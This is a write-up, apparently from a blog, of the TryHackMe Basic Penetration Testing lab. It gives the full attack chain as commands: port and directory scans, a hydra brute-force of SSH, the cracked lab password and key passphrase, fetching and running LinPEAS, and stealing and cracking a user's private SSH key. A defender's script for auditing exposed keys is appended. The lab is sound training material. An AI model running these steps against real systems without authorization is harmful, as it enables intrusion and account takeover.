TryHackMe Basic Penetration Testing — Full Walkthrough
Source: John Hammond’s full run of the TryHackMe Basic Penetration Testing room (originally released 2020). Find the session on his channel or search YouTube.
emptyarray.com — Educational only. This write-up documents a beginner-style test
against a vulnerable Linux host in TryHackMe’s isolated lab. Substitute your own target IP where
examples use 10.10.100.180.
The room walks through a compact, realistic flow: connect over VPN, scan services, enumerate web and SMB, gain a foothold over SSH, then escalate using standard open-source tooling. Every step below maps to what you can reproduce in the free room.
Tools used
| Tool | Purpose |
|---|---|
| OpenVPN | Connect to the TryHackMe private network |
| nmap | Port scanning and service detection |
| gobuster | Directory and file brute-forcing |
| enum4linux | SMB enumeration |
| hydra | Password brute-forcing (SSH) |
| LinPEAS | Automated Linux privilege-escalation checks |
| John the Ripper | Cracking SSH key passphrases |
| ssh | Remote access with password or private key |
Step-by-step walkthrough
Setup
- Create a free TryHackMe account and open the Basic Penetration Testing room.
- Deploy the target machine and note its IP (example: 10.10.100.180).
- Connect to the TryHackMe VPN with your downloaded .ovpn profile.
openvpn --config tryhackme.ovpn
Initial reconnaissance
Run nmap with default scripts (-sC) and version detection (-sV) to discover open ports and services, saving the output to initial_scan.txt:
nmap -sC -sV -oN initial_scan.txt 10.10.100.180
Typical findings for this room:
- Port 22 — SSH
- Port 80 — Apache
- Ports 139/445 — SMB
Web enumeration
Browse to http://10.10.100.180 — a basic Apache page.
Brute-force directories with gobuster (common wordlist first):
gobuster dir -u http://10.10.100.180 -w /usr/share/wordlists/dirb/common.txt -x php,txt
A deeper pass with the medium list:
gobuster dir -u http://10.10.100.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
This surfaces /development with two text files — dev.txt and
j.txt — worth reading for hints.
SMB enumeration
Enumerate SMB with enum4linux:
enum4linux -a 10.10.100.180
Expect usernames such as jan and k, plus supporting detail for the next steps.
Credential harvesting & initial access
Read the files under /development for password-policy and context clues, then brute-force
SSH for user jan with hydra and rockyou:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.100.180
Successful login in the walkthrough: jan / Armando.
Post-exploitation & privilege escalation
SSH in as jan:
ssh jan@10.10.100.180
Explore the filesystem; look for references to user k and Tomcat. Pull LinPEAS for a
structured privesc sweep:
wget -O linpeas.sh https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh
LinPEAS calls out a private SSH key at /home/k/.ssh/id_rsa.
Copy the key to your attacking machine, then prepare a hash for John:
ssh2john id_rsa > key.hash
john key.hash --wordlist=/usr/share/wordlists/rockyou.txt
Passphrase from the walkthrough: beeswax.
Final access
SSH as k with the private key:
ssh -i id_rsa k@10.10.100.180
Enter the passphrase when prompted, then read the remaining task files to finish the room.
Key lessons
- Enumeration dominates — hidden paths, SMB, and stray text files usually carry the next clue.
- Weak passwords and unprotected private keys show up constantly on misconfigured lab boxes.
- LinPEAS and enum4linux compress hours of manual triage.
- Test multiple services (web, SMB, SSH); the chain is rarely linear or obvious.
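A defender-side check for the second lesson above, added here and not part of the original walkthrough: it lists SSH private keys under a home-directory root whose file mode grants any group or other access, assuming that is why k's id_rsa could be copied from jan's session. The k and jan directory names mirror the page; the sample tree and its key contents are constructed, and the function names are hypothetical.

```shell
#!/bin/sh
# Added example (not from the walkthrough): audit home directories for
# SSH private keys that are accessible to anyone other than the owner.

# audit_ssh_keys ROOT -> prints "<mode> <path>" for each exposed private key.
audit_ssh_keys() {
    root="${1:-/home}"
    # Any group/other permission bit set on a file inside a .ssh directory.
    find "$root" -type f -path '*/.ssh/*' \
        \( -perm -040 -o -perm -020 -o -perm -010 \
           -o -perm -004 -o -perm -002 -o -perm -001 \) 2>/dev/null |
    while IFS= read -r f; do
        # Skip public keys, known_hosts, etc.: require a private-key header.
        head -n 1 "$f" 2>/dev/null |
            grep -q -e '-----BEGIN .*PRIVATE KEY-----' || continue
        printf '%s %s\n' "$(ls -ld "$f" | cut -c1-10)" "$f"
    done
}

# build_sample_tree -> creates a constructed home layout, prints its path.
build_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/k/.ssh" "$d/jan/.ssh"
    # Constructed placeholder files: only the header line is meaningful.
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'constructed-sample' \
        > "$d/k/.ssh/id_rsa"
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'constructed-sample' \
        > "$d/jan/.ssh/id_rsa"
    printf '%s\n' 'ssh-rsa constructed-sample k@host' > "$d/k/.ssh/id_rsa.pub"
    chmod 644 "$d/k/.ssh/id_rsa" "$d/k/.ssh/id_rsa.pub"   # exposed key
    chmod 600 "$d/jan/.ssh/id_rsa"                        # owner-only key
    printf '%s\n' "$d"
}

# Demo on the constructed tree; on a real host run: audit_ssh_keys /home
demo=$(build_sample_tree)
audit_ssh_keys "$demo"
rm -rf "$demo"
```

Only the 644 private key is reported; the public key and the 600 key are not. The remediation for a finding is `chmod 600` on the key and `chmod 700` on its `.ssh` directory, plus rotating any key that was exposed.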
Ethical note
These techniques belong in authorized contexts only — such as this TryHackMe room. Do not run them against systems you do not have explicit permission to test.
The room is a clean end-to-end slice of basic pentesting and remains a strong first hands-on path. You can follow the same flow in the free lab: tryhackme.com/room/basicpentesting.